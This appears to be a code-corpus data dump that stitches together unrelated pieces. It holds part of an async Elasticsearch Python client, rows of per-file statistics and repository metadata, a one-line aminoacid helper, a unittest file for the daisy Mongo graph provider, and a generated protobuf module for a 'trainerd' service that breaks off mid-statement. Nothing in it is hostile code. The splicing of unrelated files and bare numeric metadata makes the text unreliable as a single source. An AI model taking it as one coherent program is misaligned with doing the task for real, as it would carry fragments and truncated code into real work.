wait_for_merge=default, force=default):
"""Explicitly optimize one or more indices through an API."""
params = {}
if force is not default:
params['force'] = bool(force)
if flush is not default:
params['flush'] = bool(flush)
if max_num_segments is not default:
params['max_num_segments'] = int(max_num_segments)
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if only_expunge_deletes is not default:
params['only_expunge_deletes'] = bool(only_expunge_deletes)
if operation_threading is not default:
params['operation_threading'] = operation_threading
if wait_for_merge is not default:
params['wait_for_merge'] = bool(wait_for_merge)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
_, data = yield from self.transport.perform_request(
'POST', _make_path(index, '_optimize'), params=params)
return data
@asyncio.coroutine
def validate_query(self, index=None, doc_type=None, body=None, *,
explain=default, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default, operation_threading=default,
q=default, source=default):
"""Validate a potentially expensive query without executing it."""
params = {}
if explain is not default:
params['explain'] = bool(explain)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if q is not default:
params['q'] = str(q)
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if source is not default:
params['source'] = str(source)
if operation_threading is not default:
params['operation_threading'] = operation_threading
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, doc_type, '_validate', 'query'),
params=params, body=body)
return data
@asyncio.coroutine
def clear_cache(self, index=None, *,
field_data=default, fielddata=default, fields=default,
filter=default, filter_cache=default, filter_keys=default,
id=default, id_cache=default, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default, recycler=default):
"""Clear cache.
Clear either all caches or specific cached associated with one or
more indices.
"""
params = {}
if recycler is not default:
params['recycler'] = bool(recycler)
if id_cache is not default:
params['id_cache'] = bool(id_cache)
if id is not default:
params['id'] = bool(id)
if filter_keys is not default:
params['filter_keys'] = filter_keys
if filter_cache is not default:
params['filter_cache'] = bool(filter_cache)
if filter is not default:
params['filter'] = bool(filter)
if fields is not default:
params['fields'] = fields
if field_data is not default:
params['field_data'] = bool(field_data)
if fielddata is not default:
params['fielddata'] = bool(fielddata)
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
_, data = yield from self.transport.perform_request(
'POST', _make_path(index, '_cache', 'clear'),
params=params)
return data
@asyncio.coroutine
def recovery(self, index=None, *,
active_only=default, detailed=default, human=default):
"""Recover an index.
The indices recovery API provides insight into on-going shard
recoveries. Recovery status may be reported for specific indices, or
cluster-wide.
"""
params = {}
if active_only is not default:
params['active_only'] = bool(active_only)
if detailed is not default:
params['detailed'] = bool(detailed)
if human is not default:
params['human'] = bool(human)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_recovery'), params=params)
return data
| 44.023316
| 113
| 0.607995
| 5,617
| 50,979
| 5.356952
| 0.053765
| 0.030907
| 0.067797
| 0.092124
| 0.826886
| 0.800432
| 0.786607
| 0.765969
| 0.753606
| 0.721635
| 0
| 0
| 0.309108
| 50,979
| 1,157
| 114
| 44.061366
| 0.85432
| 0.218168
| 0
| 0.717258
| 0
| 0
| 0.121531
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044064
| false
| 0
| 0.004896
| 0
| 0.099143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3fa906e89622df8e791b9b4e0cd124633752065
| 115
|
py
|
Python
|
molsysmt/element/group/aminoacid/is_aminoacid.py
|
uibcdf/MolModMTs
|
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
|
[
"MIT"
] | null | null | null |
molsysmt/element/group/aminoacid/is_aminoacid.py
|
uibcdf/MolModMTs
|
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
|
[
"MIT"
] | null | null | null |
molsysmt/element/group/aminoacid/is_aminoacid.py
|
uibcdf/MolModMTs
|
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
|
[
"MIT"
] | null | null | null |
from .get_aminoacid_type_from_name import name_to_type
def is_aminoacid(name):
return (name in name_to_type)
| 19.166667
| 54
| 0.808696
| 20
| 115
| 4.2
| 0.55
| 0.142857
| 0.238095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13913
| 115
| 5
| 55
| 23
| 0.848485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
585e6e8ac0813fba7b68734c5473ee1f2aab876e
| 9,049
|
py
|
Python
|
parked_tests/test_graph_attribute_functions.py
|
rhoadesScholar/daisy
|
78cdd2ed0d67647a6602fb53cc952214450f3753
|
[
"MIT"
] | null | null | null |
parked_tests/test_graph_attribute_functions.py
|
rhoadesScholar/daisy
|
78cdd2ed0d67647a6602fb53cc952214450f3753
|
[
"MIT"
] | null | null | null |
parked_tests/test_graph_attribute_functions.py
|
rhoadesScholar/daisy
|
78cdd2ed0d67647a6602fb53cc952214450f3753
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
import daisy
import logging
import unittest
import networkx as nx
logger = logging.getLogger(__name__)
# logging.basicConfig(level=logging.DEBUG)
daisy.scheduler._NO_SPAWN_STATUS_THREAD = True
class TestFilterMongoGraph(unittest.TestCase):
def get_mongo_graph_provider(
self, mode):
return daisy.persistence.MongoDbGraphProvider(
'test_daisy_graph',
directed=True,
mode=mode)
def test_graph_filtering(self):
graph_provider = self.get_mongo_graph_provider('w')
roi = daisy.Roi((0, 0, 0),
(10, 10, 10))
graph = graph_provider[roi]
graph.add_node(2, position=(2, 2, 2), selected=True)
graph.add_node(42, position=(1, 1, 1), selected=False)
graph.add_node(23, position=(5, 5, 5), selected=True)
graph.add_node(57, position=daisy.Coordinate((7, 7, 7)), selected=True)
graph.add_edge(42, 23, selected=False)
graph.add_edge(57, 23, selected=True)
graph.add_edge(2, 42, selected=True)
graph.write_nodes()
graph.write_edges()
graph_provider = self.get_mongo_graph_provider('r')
filtered_nodes = graph_provider.read_nodes(
roi, attr_filter={'selected': True})
filtered_node_ids = [node['id'] for node in filtered_nodes]
expected_node_ids = [2, 23, 57]
self.assertCountEqual(expected_node_ids, filtered_node_ids)
filtered_edges = graph_provider.read_edges(
roi, attr_filter={'selected': True})
filtered_edge_endpoints = [(edge['u'], edge['v'])
for edge in filtered_edges]
expected_edge_endpoints = [(57, 23), (2, 42)]
self.assertCountEqual(expected_edge_endpoints, filtered_edge_endpoints)
filtered_subgraph = graph_provider.get_graph(
roi,
nodes_filter={'selected': True},
edges_filter={'selected': True})
nodes_with_position = [node for node, data
in filtered_subgraph.nodes(data=True)
if 'position' in data]
self.assertCountEqual(expected_node_ids, nodes_with_position)
self.assertCountEqual(expected_edge_endpoints,
filtered_subgraph.edges())
def test_graph_filtering_complex(self):
graph_provider = self.get_mongo_graph_provider('w')
roi = daisy.Roi((0, 0, 0),
(10, 10, 10))
graph = graph_provider[roi]
graph.add_node(2,
position=(2, 2, 2),
selected=True,
test='test')
graph.add_node(42,
position=(1, 1, 1),
selected=False,
test='test2')
graph.add_node(23,
position=(5, 5, 5),
selected=True,
test='test2')
graph.add_node(57,
position=daisy.Coordinate((7, 7, 7)),
selected=True,
test='test')
graph.add_edge(42, 23,
selected=False,
a=100,
b=3)
graph.add_edge(57, 23,
selected=True,
a=100,
b=2)
graph.add_edge(2, 42,
selected=True,
a=101,
b=3)
graph.write_nodes()
graph.write_edges()
graph_provider = self.get_mongo_graph_provider('r')
filtered_nodes = graph_provider.read_nodes(
roi, attr_filter={'selected': True,
'test': 'test'})
filtered_node_ids = [node['id'] for node in filtered_nodes]
expected_node_ids = [2, 57]
self.assertCountEqual(expected_node_ids, filtered_node_ids)
filtered_edges = graph_provider.read_edges(
roi, attr_filter={'selected': True,
'a': 100})
filtered_edge_endpoints = [(edge['u'], edge['v'])
for edge in filtered_edges]
expected_edge_endpoints = [(57, 23)]
self.assertCountEqual(expected_edge_endpoints, filtered_edge_endpoints)
filtered_subgraph = graph_provider.get_graph(
roi,
nodes_filter={'selected': True,
'test': 'test'},
edges_filter={'selected': True,
'a': 100})
nodes_with_position = [node for node, data
in filtered_subgraph.nodes(data=True)
if 'position' in data]
self.assertCountEqual(expected_node_ids, nodes_with_position)
self.assertCountEqual(expected_edge_endpoints,
filtered_subgraph.edges())
def test_graph_read_and_update_specific_attrs(self):
graph_provider = self.get_mongo_graph_provider('w')
roi = daisy.Roi((0, 0, 0),
(10, 10, 10))
graph = graph_provider[roi]
graph.add_node(2,
position=(2, 2, 2),
selected=True,
test='test')
graph.add_node(42,
position=(1, 1, 1),
selected=False,
test='test2')
graph.add_node(23,
position=(5, 5, 5),
selected=True,
test='test2')
graph.add_node(57,
position=daisy.Coordinate((7, 7, 7)),
selected=True,
test='test')
graph.add_edge(42, 23,
selected=False,
a=100,
b=3)
graph.add_edge(57, 23,
selected=True,
a=100,
b=2)
graph.add_edge(2, 42,
selected=True,
a=101,
b=3)
graph.write_nodes()
graph.write_edges()
graph_provider = self.get_mongo_graph_provider('r+')
limited_graph = graph_provider.get_graph(
roi, node_attrs=['selected'], edge_attrs=['c'])
for node, data in limited_graph.nodes(data=True):
self.assertFalse('test' in data)
self.assertTrue('selected' in data)
data['selected'] = True
for u, v, data in limited_graph.edges(data=True):
self.assertFalse('a' in data)
self.assertFalse('b' in data)
nx.set_edge_attributes(limited_graph, 5, 'c')
limited_graph.update_edge_attrs(attributes=['c'])
limited_graph.update_node_attrs(attributes=['selected'])
updated_graph = graph_provider.get_graph(roi)
for node, data in updated_graph.nodes(data=True):
self.assertTrue(data['selected'])
for u, v, data in updated_graph.edges(data=True):
self.assertEqual(data['c'], 5)
def test_graph_read_unbounded_roi(self):
graph_provider = self.get_mongo_graph_provider('w')
roi = daisy.Roi((0, 0, 0),
(10, 10, 10))
unbounded_roi = daisy.Roi((None, None, None), (None, None, None))
graph = graph_provider[roi]
graph.add_node(2,
position=(2, 2, 2),
selected=True,
test='test')
graph.add_node(42,
position=(1, 1, 1),
selected=False,
test='test2')
graph.add_node(23,
position=(5, 5, 5),
selected=True,
test='test2')
graph.add_node(57,
position=daisy.Coordinate((7, 7, 7)),
selected=True,
test='test')
graph.add_edge(42, 23,
selected=False,
a=100,
b=3)
graph.add_edge(57, 23,
selected=True,
a=100,
b=2)
graph.add_edge(2, 42,
selected=True,
a=101,
b=3)
graph.write_nodes()
graph.write_edges()
graph_provider = self.get_mongo_graph_provider('r+')
limited_graph = graph_provider.get_graph(
unbounded_roi, node_attrs=['selected'], edge_attrs=['c'])
seen = []
for node, data in limited_graph.nodes(data=True):
self.assertFalse('test' in data)
self.assertTrue('selected' in data)
data['selected'] = True
seen.append(node)
self.assertCountEqual(seen, [2, 42, 23, 57])
| 36.051793
| 79
| 0.502155
| 948
| 9,049
| 4.565401
| 0.105485
| 0.090111
| 0.044362
| 0.043669
| 0.821858
| 0.786275
| 0.779575
| 0.746303
| 0.746303
| 0.746303
| 0
| 0.042429
| 0.395734
| 9,049
| 250
| 80
| 36.196
| 0.749086
| 0.00442
| 0
| 0.752381
| 0
| 0
| 0.029422
| 0
| 0
| 0
| 0
| 0
| 0.080952
| 1
| 0.02381
| false
| 0
| 0.02381
| 0.004762
| 0.057143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
586e8d8d8b9e2b527886a629551621c55e26b844
| 94,580
|
py
|
Python
|
lang/python/github/com/metaprov/modelaapi/services/trainerd/v1/trainerd_pb2.py
|
metaprov/modeldapi
|
ee05693832051dcd990ee4f061715d7ae0787340
|
[
"Apache-2.0"
] | null | null | null |
lang/python/github/com/metaprov/modelaapi/services/trainerd/v1/trainerd_pb2.py
|
metaprov/modeldapi
|
ee05693832051dcd990ee4f061715d7ae0787340
|
[
"Apache-2.0"
] | null | null | null |
lang/python/github/com/metaprov/modelaapi/services/trainerd/v1/trainerd_pb2.py
|
metaprov/modeldapi
|
ee05693832051dcd990ee4f061715d7ae0787340
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: github.com/metaprov/modelaapi/services/trainerd/v1/trainerd.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1 import generated_pb2 as github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2
from github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1 import generated_pb2 as github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2
from github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1 import generated_pb2 as github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2
from github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1 import generated_pb2 as github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_catalog_dot_v1alpha1_dot_generated__pb2
from k8s.io.api.core.v1 import generated_pb2 as k8s_dot_io_dot_api_dot_core_dot_v1_dot_generated__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='github.com/metaprov/modelaapi/services/trainerd/v1/trainerd.proto',
package='github.com.metaprov.modelaapi.services.trainerd.v1',
syntax='proto3',
serialized_options=b'Z2github.com/metaprov/modelaapi/services/trainerd/v1',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\nAgithub.com/metaprov/modelaapi/services/trainerd/v1/trainerd.proto\x12\x32github.com.metaprov.modelaapi.services.trainerd.v1\x1aHgithub.com/metaprov/modelaapi/pkg/apis/training/v1alpha1/generated.proto\x1a\x44github.com/metaprov/modelaapi/pkg/apis/data/v1alpha1/generated.proto\x1a\x45github.com/metaprov/modelaapi/pkg/apis/infra/v1alpha1/generated.proto\x1aGgithub.com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1/generated.proto\x1a\"k8s.io/api/core/v1/generated.proto\"\xbd\x06\n\x0cTrainRequest\x12R\n\x07product\x18\x01 \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProduct\x12Y\n\x07version\x18\x02 \x01(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProductVersion\x12T\n\x06\x62ucket\x18\x03 \x01(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.VirtualBucket\x12N\n\x05model\x18\x05 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05study\x18\x06 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Study\x12T\n\ndatasource\x18\x07 \x01(\x0b\x32@.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataSource\x12N\n\x07\x64\x61taset\x18\x08 \x01(\x0b\x32=.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.Dataset\x12U\n\nconnection\x18\t \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.Connection\x12\\\n\x06secret\x18\n \x03(\x0b\x32L.github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.SecretEntry\x1a-\n\x0bSecretEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x0c:\x02\x38\x01\"\xa8\x04\n\rTrainResponse\x12T\n\x06result\x18\x01 \x03(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement\x12\x17\n\x0fweightsCloudUri\x18\x02 \x01(\t\x12\x18\n\x10manifestCloudUri\x18\x03 \x01(\t\x12\x14\n\x0clogsCloudUri\x18\x04 \x01(\t\x12\x14\n\x0clabelEncoder\x18\x05 \x01(\t\x12\x19\n\x11pythonVersionInfo\x18\x06 \x01(\t\x12\x63\n\tpipFreeze\x18\x07 \x03(\x0b\x32P.github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.PipFreezeEntry\x12u\n\x12\x66\x65\x61turesImportance\x18\x08 \x03(\x0b\x32Y.github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.FeaturesImportanceEntry\x1a\x30\n\x0ePipFreezeEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\x1a\x39\n\x17\x46\x65\x61turesImportanceEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x02:\x02\x38\x01\"\xc1\x06\n\x0e\x43ompileRequest\x12R\n\x07product\x18\x01 \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProduct\x12Y\n\x07version\x18\x02 \x01(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProductVersion\x12T\n\x06\x62ucket\x18\x03 \x01(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.VirtualBucket\x12N\n\x05model\x18\x05 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05study\x18\x06 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Study\x12T\n\ndatasource\x18\x07 \x01(\x0b\x32@.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataSource\x12N\n\x07\x64\x61taset\x18\x08 \x01(\x0b\x32=.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.Dataset\x12U\n\nconnection\x18\t \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.Connection\x12^\n\x06secret\x18\n \x03(\x0b\x32N.github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.SecretEntry\x1a-\n\x0bSecretEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x0c:\x02\x38\x01\"+\n\x0f\x43ompileResponse\x12\x18\n\x10\x63ompiledModelUri\x18\x01 \x01(\t\"\xbb\x06\n\x0bTestRequest\x12R\n\x07product\x18\x01 \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProduct\x12Y\n\x07version\x18\x02 \x01(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProductVersion\x12T\n\x06\x62ucket\x18\x03 \x01(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.VirtualBucket\x12N\n\x05model\x18\x05 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05study\x18\x06 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Study\x12T\n\ndatasource\x18\x07 \x01(\x0b\x32@.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataSource\x12N\n\x07\x64\x61taset\x18\x08 \x01(\x0b\x32=.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.Dataset\x12U\n\nconnection\x18\t \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.Connection\x12[\n\x06secret\x18\n \x03(\x0b\x32K.github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.SecretEntry\x1a-\n\x0bSecretEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x0c:\x02\x38\x01\"\xdc\x06\n\x0cTestResponse\x12Z\n\x0ctrain_result\x18\x01 \x03(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement\x12Y\n\x0btest_result\x18\x02 \x03(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement\x12^\n\x10\x62\x65nchmark_result\x18\x03 \x03(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement\x12\x1c\n\x14modelWeightsCloudUri\x18\x04 \x01(\t\x12\x1d\n\x15modelManifestCloudUri\x18\x05 \x01(\t\x12\x19\n\x11modelLogsCloudUri\x18\x06 \x01(\t\x12\x1a\n\x12preWeightsCloudUri\x18\x07 \x01(\t\x12\x1b\n\x13preManifestCloudUri\x18\x08 \x01(\t\x12\x17\n\x0fpreLogsCloudUri\x18\t \x01(\t\x12\x14\n\x0clabelEncoder\x18\n \x01(\t\x12\x13\n\x0bmisclassUri\x18\x0b \x01(\t\x12\x19\n\x11pythonVersionInfo\x18\x0c \x01(\t\x12\x62\n\tpipFreeze\x18\r \x03(\x0b\x32O.github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.PipFreezeEntry\x12t\n\x12\x66\x65\x61turesImportance\x18\x0e \x03(\x0b\x32X.github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.FeaturesImportanceEntry\x1a\x30\n\x0ePipFreezeEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\x1a\x39\n\x17\x46\x65\x61turesImportanceEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x02:\x02\x38\x01\"\x9c\x07\n\x14TrainEnsembleRequest\x12R\n\x07product\x18\x01 \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProduct\x12Y\n\x07version\x18\x02 \x01(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProductVersion\x12T\n\x06\x62ucket\x18\x03 \x01(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.VirtualBucket\x12M\n\x04\x62\x61se\x18\x05 \x03(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05model\x18\x06 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05study\x18\x07 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Study\x12T\n\ndatasource\x18\x08 \x01(\x0b\x32@.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataSource\x12N\n\x07\x64\x61taset\x18\t \x01(\x0b\x32=.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.Dataset\x12U\n\nconnection\x18\n \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.Connection\x12\x64\n\x06secret\x18\x0b \x03(\x0b\x32T.github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.SecretEntry\x1a-\n\x0bSecretEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x0c:\x02\x38\x01\"\x9a\x07\n\x13TestEnsembleRequest\x12R\n\x07product\x18\x01 \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProduct\x12Y\n\x07version\x18\x02 \x01(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProductVersion\x12T\n\x06\x62ucket\x18\x03 \x01(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.VirtualBucket\x12M\n\x04\x62\x61se\x18\x05 \x03(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05model\x18\x06 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05study\x18\x07 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Study\x12T\n\ndatasource\x18\x08 \x01(\x0b\x32@.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataSource\x12N\n\x07\x64\x61taset\x18\t \x01(\x0b\x32=.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.Dataset\x12U\n\nconnection\x18\n \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.Connection\x12\x63\n\x06secret\x18\x0b \x03(\x0b\x32S.github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.SecretEntry\x1a-\n\x0bSecretEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x0c:\x02\x38\x01\"\xc3\x06\n\x0f\x46orecastRequest\x12R\n\x07product\x18\x01 \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProduct\x12Y\n\x07version\x18\x02 \x01(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProductVersion\x12T\n\x06\x62ucket\x18\x03 \x01(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.VirtualBucket\x12N\n\x05model\x18\x05 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05study\x18\x06 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Study\x12T\n\ndatasource\x18\x07 \x01(\x0b\x32@.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataSource\x12N\n\x07\x64\x61taset\x18\x08 \x01(\x0b\x32=.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.Dataset\x12U\n\nconnection\x18\t \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.Connection\x12_\n\x06secret\x18\n \x03(\x0b\x32O.github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.SecretEntry\x1a-\n\x0bSecretEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x0c:\x02\x38\x01\",\n\x10\x46orecastResponse\x12\x18\n\x10\x66orecastCloudUri\x18\x02 \x01(\t\"\x11\n\x0fShutdownRequest\"\x12\n\x10ShutdownResponse2\xa3\x07\n\x0fTrainerdService\x12\x8e\x01\n\x05Train\x12@.github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest\x1a\x41.github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse\"\x00\x12\x97\x01\n\x08\x46orecast\x12\x43.github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest\x1a\x44.github.com.metaprov.modelaapi.services.trainerd.v1.ForecastResponse\"\x00\x12\x8b\x01\n\x04Test\x12?.github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest\x1a@.github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse\"\x00\x12\x9e\x01\n\rTrainEnsemble\x12H.github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest\x1a\x41.github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse\"\x00\x12\x9b\x01\n\x0cTestEnsemble\x12G.github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest\x1a@.github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse\"\x00\x12\x97\x01\n\x08Shutdown\x12\x43.github.com.metaprov.modelaapi.services.trainerd.v1.ShutdownRequest\x1a\x44.github.com.metaprov.modelaapi.services.trainerd.v1.ShutdownResponse\"\x00\x42\x34Z2github.com/metaprov/modelaapi/services/trainerd/v1b\x06proto3'
,
